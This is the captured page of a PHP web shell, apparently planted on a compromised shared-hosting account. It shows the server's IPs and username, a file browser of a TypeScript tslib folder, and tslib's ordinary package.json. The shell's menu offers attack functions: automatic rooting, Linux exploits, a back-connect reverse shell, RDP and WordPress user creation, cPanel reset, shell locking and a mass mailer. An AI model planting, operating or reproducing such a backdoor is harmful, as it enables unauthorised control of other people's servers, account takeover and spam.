Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
tslib /
[ HOME SHELL ]
Name
Size
Permission
Action
modules
[ DIR ]
dr-xr-xr-x
CopyrightNotice.txt
824
B
-rw-r--r--
LICENSE.txt
655
B
-rw-r--r--
README.md
3.94
KB
-rw-r--r--
package.json
914
B
-rw-r--r--
tslib.d.ts
4.81
KB
-rw-r--r--
tslib.es6.html
36
B
-rw-r--r--
tslib.es6.js
11.53
KB
-rw-r--r--
tslib.html
32
B
-rw-r--r--
tslib.js
14.51
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "tslib", "author": "Microsoft Corp.", "homepage": "https://www.typescriptlang.org/", "version": "2.3.1", "license": "0BSD", "description": "Runtime library for TypeScript helper functions", "keywords": [ "TypeScript", "Microsoft", "compiler", "language", "javascript", "tslib", "runtime" ], "bugs": { "url": "https://github.com/Microsoft/TypeScript/issues" }, "repository": { "type": "git", "url": "https://github.com/Microsoft/tslib.git" }, "main": "tslib.js", "module": "tslib.es6.js", "jsnext:main": "tslib.es6.js", "typings": "tslib.d.ts", "sideEffects": false, "exports": { ".": { "module": "./tslib.es6.js", "import": "./modules/index.js", "default": "./tslib.js" }, "./": "./" } }
Close